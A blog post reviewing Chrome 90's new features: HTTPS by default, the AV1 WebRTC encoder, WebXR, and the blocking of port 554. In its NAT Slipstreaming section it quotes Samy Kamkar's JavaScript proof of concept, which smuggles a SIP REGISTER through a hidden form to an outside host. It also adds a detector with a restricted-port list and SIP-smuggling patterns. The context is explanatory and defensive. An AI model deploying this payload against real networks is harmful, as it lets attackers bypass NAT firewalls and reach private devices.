By Hanyan
Chrome 90, which was released on April 13, brings some interesting new features.
Background
In the past decade or so, web technology has advanced by leaps and bounds, and Chrome has contributed more than any other browser. For those of us working on the "big front end", following Chrome helps us understand what is going on in the industry.
Actually, I’ve been following Chrome for a long time, and I’ve written a few blog posts about Chrome:
- Lesson 3: What is Garbage Collection?
- Lesson 4: How does V8 work?
- Lesson 5: How Chrome works
- Third-party cookies will no longer be allowed: how will Internet advertising work?
- The Great Chrome Browser: Chrome 89 opens the Internet of Things for web applications
While writing the Chrome 89 post, I realized that I could write about Chrome in a much more focused, in-depth, and systematic way. On the one hand, this improves my professional ability and my writing; on the other hand, it builds my influence. I also hope to publish a book on Chrome within five years, since publishing a book is the ultimate goal of every writer.
Therefore, under the title "The Great Chrome Browser", I will give a detailed interpretation of each Chrome version, and also introduce Chrome in depth from every angle, sharing some of my own (still immature) thinking. You are welcome to follow the Hanyan Talk public account.
TL;DR
- When was Chrome 90 released? 2021-04-13
- How many features have been updated in Chrome 90? For details of the features, see Chrome Platform Status
- Which version of the V8 engine does Chrome 90 use? v9.0
- What is the biggest highlight of Chrome 90? Using HTTPS by default. It is a very small change, but an important one: the era of naked HTTP is finally coming to an end. Unfortunately, this feature is still in a staged rollout and has not been fully released
- Which new features am I interested in, in order?
  - A safer default for navigation: HTTPS
  - AV1 Encoder
  - WebXR Depth API and WebXR AR Lighting Estimation
  - Feature: Block HTTP port 554
- Which new features are you interested in, in order? That I don't know; feel free to leave a comment!
Detailed interpretation
A safer default for navigation: HTTPS
Type the URL in the browser address bar, then press Enter, and what happens? This is a classic interview question.
Chrome 90 now opens typed URLs over HTTPS by default, which changes the answer to this interview question slightly.
When we type example.com, Chrome before 90 accesses example.com over HTTP by default, and the server, if configured for redirection, redirects to https://example.co… Chrome 90 will access example.com over HTTPS by default.
Seeing is believing, so let's try a simple test. PS: clear browsing data before testing; otherwise Chrome will already use HTTPS the second time the site is visited.
When I open kiwenlau.com using Chrome 89, I find that the first request is HTTP (kiwenlau.com/) and returns status 301, redirecting…
When I open kiwenlau.com using Chrome 90, the first request is still HTTP (kiwenlau.com/), not HTTPS…
I thought it was a bug, so I filed an issue:
- Issue 1200048: Chrome 90 does not use https by default
The relevant flag was already enabled on my machine: #omnibox-default-typed-navigations-to-https: Enabled
Strictly speaking, it's not a big deal that only the very first request to kiwenlau.com uses HTTP. However, remember that HTTP itself is transmitted in plain text (the HTTP/2 specification does not require encryption, but every browser only supports HTTP/2 over TLS, so in practice only HTTPS can be upgraded to HTTP/2), which means that every node on the network path can read and tamper with HTTP traffic. This is also the basic principle behind page hijacking, which is a little scary to think about, especially for those of you who like to visit dubious websites.
For HTTP requests, the content is in plain text:
For HTTPS requests, the content is encrypted and looks like gibberish:
Of course, for sites that support HTTPS, eliminating the HTTP-to-HTTPS redirect also improves performance, but that is secondary: after all, it is only one HTTP request, and many sites are already so slow that nobody cares about a few tens of milliseconds…
Chrome has been pushing the HTTPS protocol into the industry, and I’ll write a blog post about that later.
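To make the Chrome 89 versus Chrome 90 behaviour above concrete, here is an added example (written for this post, not Chrome's own code) that models the omnibox scheme choice and the resulting request chain against a constructed table of server responses. The exceptions that stay on HTTP (IP literals, single-label hosts, explicit non-443 ports) and the fallback to HTTP when HTTPS fails follow the "A safer default for navigation: HTTPS" post in the references; SERVERS is constructed sample data, not real traffic.

```python
import ipaddress
from urllib.parse import urlsplit
# Constructed responses for the demo (no real network traffic):
# origin -> (status, Location). An origin missing from the table is not served.
SERVERS = {
    "http://kiwenlau.com":   (301, "https://kiwenlau.com/"),
    "https://kiwenlau.com":  (200, None),
    "http://http-only.test": (200, None),
}

def default_scheme(typed: str, https_first: bool) -> str:
    """Scheme prepended to a bare omnibox input.

    https_first=False models Chrome <= 89 (always http). https_first=True
    models Chrome 90: https unless the host is an IP literal, a single-label
    name (localhost, intranet names) or carries an explicit non-443 port.
    Simplified model written for this post, not Chrome's own source.
    """
    if not https_first:
        return "http"
    parts = urlsplit("//" + typed)
    host = parts.hostname or ""
    try:
        ipaddress.ip_address(host)
        return "http"          # IP literal stays on HTTP
    except ValueError:
        pass
    if "." not in host or parts.port not in (None, 443):
        return "http"          # single-label host or custom port stays on HTTP
    return "https"

def request_chain(typed: str, https_first: bool) -> list:
    """Requests actually issued as (url, status), following redirects."""
    url = typed if "://" in typed else default_scheme(typed, https_first) + "://" + typed
    chain = []
    while url:
        origin = url.rstrip("/")
        if origin not in SERVERS and origin.startswith("https://"):
            # Chrome 90 falls back to plain HTTP when the HTTPS attempt fails.
            url = "http://" + origin[len("https://"):]
            continue
        status, location = SERVERS.get(origin, (404, None))
        chain.append((url, status))
        url = location
    return chain

def plaintext_hops(chain: list) -> int:
    """How many requests in the chain went over the wire unencrypted."""
    return sum(1 for url, _ in chain if url.startswith("http://"))
```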
AV1 Encoder
The full name of AV1 is AOMedia Video 1, an open-source, royalty-free video coding format designed for higher compression efficiency. According to data from Netflix and Facebook, AV1 improves compression efficiency by 20% to 30% compared with VP9. iQiyi also adopted the AV1 format last year, saving 20 percent of bandwidth. AV1 is also supported by Argos, YouTube's new custom Video Coding Unit (VCU).
Expensive bandwidth has been a heavy burden for video apps, and is one of the key reasons why some well-known long-form video sites have been unable to make money (content costs are the other). According to its latest financial report, iQiyi posted a net loss of 7 billion yuan in 2020, of which bandwidth expenses amounted to 2.4 billion yuan, 34.3 percent of the loss. For video applications, a more efficient video coding format like AV1 helps reduce bandwidth costs.
The full name of WebRTC is Web Real-Time Communication; it is used to implement real-time video and voice communication in web applications. WebRTC is already a 10-year-old technology, and the pandemic has fuelled an explosion in demand for video conferencing, making WebRTC even more important.
Chrome 90 adds an AV1 encoder for WebRTC, which optimizes WebRTC video communication in three ways: better compression efficiency and lower bandwidth usage; support for video at 30 kbps and lower bit rates, serving users with little bandwidth; and more efficient screen sharing.
It has been more than a year since the pandemic broke out worldwide, which has greatly increased users' demand for video conferencing and live streaming. Technological progress like the AV1 encoder helps people get through the current difficulties, which is also the greatest significance of technology.
AV1 was developed by AOMedia (the Alliance for Open Media) to replace Google's VP9 and compete with H.265, which requires royalty fees. In fact, AOMedia is no outsider: Google is a core member of AOMedia, and AV1 was developed by Google. As a programmer, you have to accept that Google is everywhere when it comes to promoting technological progress. How Google is advancing video coding technology is a topic for another blog post that I'll elaborate on (again).
For those of you using WebRTC to develop a web video conferencing application, try the AV1 encoder and share how it works for you.
WebXR Depth API and WebXR AR Lighting Estimation
The WebXR Depth API and WebXR AR Lighting Estimation are WebXR-related feature updates. The WebXR Depth API can be used to obtain the distance between the user's device and objects in the real world. WebXR AR Lighting Estimation can be used to capture the lighting conditions of the environment.
Most of you probably haven't used WebXR, so let's take a look at what WebXR is…
WebXR is an API for developing AR (Augmented Reality) and VR (Virtual Reality) applications on the web. AR and VR both end with the letter R, hence the name XR.
WebXR Experiments has some examples of WebXR that give you a taste of what it can do.
Sodar, for example, can be used to measure 2 m of social distance:
Here's another example, Picturescape, which hasn't been released yet. It's fun to look at, but I haven't quite figured out what it's all about. We'll check it out when it's official:
Judging from the WebXR examples, the applications built with WebXR are relatively simple at present. After all, VR and AR applications themselves are still relatively simple and rough. What I'm most interested in is their use in gaming. When will the gameplay experience of Ready Player One be available? Wait and see!
Feature: Block HTTP port 554
Chrome 90 blocks port 554 in an effort to mitigate NAT Slipstreaming 2.0 attacks. Note that the word is mitigate, not fix: Chrome alone cannot fundamentally prevent NAT Slipstreaming 2.0 attacks.
NAT Slipstreaming, discovered by Samy Kamkar at the end of October, is a very clever and dangerous attack. He then worked with Armis researchers Ben Seri and Gregory Vishnipolsky to discover a new version, NAT Slipstreaming 2.0.
Simply put, the victim only needs to visit the attacker's website, which embeds the attacker's JavaScript, and the attacker can bypass the firewall of the victim's LAN and reach any TCP/UDP service on it.
To get a feel for the attack flow, look at NAT Slipstreaming 2.0 – Enterprise Network Bypass.
The victim is located on a local area network (LAN). Devices connected to the LAN include the victim's smartphone, a printer, a webcam, and the router. In theory, devices on the LAN are protected by a firewall. The attacker, on the other hand, is on the Internet and, in theory, cannot bypass the firewall to directly reach devices on the LAN such as the printer and webcam.
The victim uses the smartphone to open a link provided by the attacker, and the attacker manages to bypass the firewall, obtain the addresses of the printer and webcam, send a print job to the printer remotely, and access the webcam remotely using its default username and password.
It is scary to think that an attacker could view your webcam if you haven't changed its default password.
Of course, if the printer and webcam have strong passwords, the attacker can't access them either, so devices on the LAN must also take proper security precautions. But that's not the point. The point is that the attacker bypassed the firewall. How?
Samy Kamkar's article is very long and contains a lot of technical detail, but the most important piece is this JavaScript code:
```javascript
// our sip message
var sipmsg = 'REGISTER sip:samy.pl;transport=TCP SIP/2.0\r\n' +
  'Contact: <sip:samy@192.168.0.109:1234;transport=TCP>\r\n\r\n'

// load form in an iframe so user doesn't see it
var iframe = document.createElement('iframe')
iframe.name = 'iframe'
iframe.style.display = 'none' // hide the iframe

// create form
var form = document.createElement('form')
form.setAttribute('target', 'iframe') // load into iframe
form.setAttribute('method', 'POST') // need the POST area where we can add CRLFs
form.setAttribute('action', 'http://samy.pl:5060') // "http" server on SIP port 5060
form.setAttribute('enctype', 'multipart/form-data') // ensure our data doesn't get encoded

var textarea = document.createElement('textarea')
textarea.setAttribute('name', 'textname') // required
textarea.innerHTML = sipmsg
form.appendChild(textarea)

document.body.appendChild(iframe)
document.body.appendChild(form)
form.submit()
```
This code sends a specially crafted POST request which, because of its size, is split into multiple TCP packets. As you can see from the code, these packets go to port 5060, which happens to be the port used by the SIP protocol. By controlling the size of the POST body, the attacker can arrange for one of the TCP packets to be interpreted by the NAT device as a SIP REGISTER message. The Application Level Gateway (ALG) of the NAT device sees this packet and opens a public port for the attacker, forwarding it to the internal TCP service the attacker wants to reach (192.168.0.109:1234 in the code). In this way the attacker can reach the internal service 192.168.0.109:1234 through the public port on the NAT. The NAT device naively forwards requests on the attacker's behalf.
This attack is so creative and technical that I'll write a blog post about it later (digging another hole). Of course, this type of attack is also very dangerous. Samy Kamkar is a genius; fortunately, he is a white-hat hacker.
Chrome's blocking of the port is a stopgap. It's true that attackers can no longer send requests to the blocked port from Chrome, but victims who don't update their browser can still be attacked. To fix this problem fundamentally, the fix still has to come from the NAT devices, especially their ALGs and firewalls.
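From the defender's side, here is an added example (not from Samy Kamkar's write-up or from Chrome) of two checks an egress proxy or IDS could apply to an outbound HTTP request of the kind shown above: is the destination one of the ports Chrome now refuses, and does the HTTP body smuggle a SIP REGISTER whose Contact points into a private network? SAMPLE_REQUEST is a constructed rendering of what the form above would put on the wire, and RESTRICTED_PORTS is only a subset of Chrome's full restricted-port list.

```python
import ipaddress
import re

# Ports Chrome refuses to connect to from a web page: 554 (added in Chrome 90,
# the subject of this section) and the SIP ports 5060/5061 that the sample
# exploit above targets. This is a subset of Chrome's full restricted list.
RESTRICTED_PORTS = {554, 5060, 5061}

SIP_REQUEST = re.compile(rb"^(REGISTER|INVITE) sip:\S+ SIP/2\.0\r?$", re.M)
SIP_CONTACT = re.compile(rb"^Contact:\s*<sip:[^@>]+@([0-9.]+):(\d+)", re.M | re.I)

def inspect_http_request(raw: bytes, dst_port: int) -> dict:
    """Heuristics an egress proxy or IDS can apply to one outbound HTTP request.

    Flags a destination port Chrome blocks, a SIP request line smuggled into
    the HTTP body, and a Contact header pointing at a private (RFC 1918) host,
    which is exactly the combination an ALG would turn into a port forward.
    """
    _head, _, body = raw.partition(b"\r\n\r\n")
    findings = {"restricted_port": dst_port in RESTRICTED_PORTS,
                "sip_in_body": False, "private_contact": None}
    if SIP_REQUEST.search(body):
        findings["sip_in_body"] = True
        m = SIP_CONTACT.search(body)
        if m:
            try:
                ip = ipaddress.ip_address(m.group(1).decode())
            except ValueError:
                ip = None  # malformed address, not a usable forward target
            if ip and ip.is_private:
                findings["private_contact"] = f"{ip}:{int(m.group(2))}"
    findings["suspicious"] = findings["sip_in_body"] and (
        findings["restricted_port"] or findings["private_contact"] is not None)
    return findings

# Constructed sample: the request the form in the article would put on the wire.
SAMPLE_REQUEST = (
    b"POST / HTTP/1.1\r\n"
    b"Host: samy.pl:5060\r\n"
    b"Content-Type: multipart/form-data; boundary=----x\r\n"
    b"\r\n"
    b"------x\r\n"
    b'Content-Disposition: form-data; name="textname"\r\n\r\n'
    b"REGISTER sip:samy.pl;transport=TCP SIP/2.0\r\n"
    b"Contact: <sip:user@192.168.0.109:1234;transport=TCP>\r\n"
    b"\r\n"
    b"------x--\r\n"
)
```

A real deployment would run this on the proxy or IDS that already sees the decrypted request, since the point is to catch the pattern before the NAT's ALG does.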
In the Internet of Things era, more and more home devices are connected to the Internet. As users, we still need to take protective measures:
- Update to the latest Chrome browser;
- Strengthen the security of LAN devices, for example with stricter passwords;
- Disable the Application Level Gateway (ALG) function of the NAT device if it is not needed;
- Avoid opening unknown URLs.
Of course, you can also choose to disconnect from the Internet, haha 🙁
Conclusion
In my opinion, the most important update in Chrome 90 is the use of HTTPS by default. It's a very small change, but an important one. Unfortunately, this feature is still in a staged rollout and has not been fully released. The era of naked HTTP is finally coming to an end. From today's perspective, it feels like a slash-and-burn era to think that the Web was based on a plaintext transport protocol. Of course, it was also a great era: **the birth of the Web itself was a change in human civilization, and we are all lucky to stand on the shoulders of giants.** If quantum computers crack RSA in the future, today's HTTPS will be naked too.
I've also covered features related to AV1, WebXR, and NAT Slipstreaming. I've focused on the background because, on their own, these features are not useful or valuable to most developers and are rather boring. However, the background knowledge behind them is still worth understanding, because it helps us grasp the various knowledge points and application scenarios of the big front end more comprehensively. I will continue to write this kind of blog post in the Great Chrome Browser series. I hope you enjoy it.
I have listed a lot of reference materials at the end of the article, a habit I developed when writing papers as a graduate student. Whenever I have reference materials, I list them. This is mainly to make it easy for me to look them up in the future, and secondly to share them with interested readers. Some of the higher-quality items are in bold; you might as well focus on those.
In the process of writing, I also found three interesting topics that can be developed further: the first is Chrome's promotion of HTTPS, the second is Google's contribution to the progress of video coding technology, and the third is NAT Slipstreaming. I will write separate blog posts on each; stay tuned.
Welcome to follow the Hanyan Talk official account and the "Great Chrome Browser" blog series, and witness the sea of stars of the big front end with me!
References
- Chrome 90 Beta: AV1 Encoder for WebRTC, New Origin Trials, and More
- A safer default for navigation: HTTPS
- New in Chrome 90: Overflow Clip, Permissions Policy, the Declarative Shadow DOM, and more!
- Chrome 90 will use HTTPS (port 443) by Default – Let us discuss
- The Great Chrome Browser: Chrome 89 opens the Internet of Things for web applications
- Real time communication with WebRTC
- Get Started with WebRTC
- Google supercharges YouTube with a custom video chip
- Netflix Now Streaming AV1 on Android
- Facebook turns on AV1 technology to speed up video streaming
- iQiyi has become the first video website in China to use the AV1 format, saving more than 20% traffic at the same image quality
- The new AV1 encoding format, H.265's biggest rival
- WebXR Experiments
- Experiment with AR and VR made for the web
- NAT Slipstreaming v2.0
- NAT Slipstreaming v2.0: New Attack Variant Can Expose All Internal Network Devices to The Internet
- NAT Slipstreaming 2.0 – Enterprise Network Bypass
- A New Attack Allows Access to any TCP/UDP service on a Machine behind NAT – NAT Slipstreaming
- Understanding NAT Slipstreaming
- Chrome will block port 554 to prevent NAT Slipstreaming attacks
- Chrome blocks multiple TCP ports to prevent NAT Slipstreaming attacks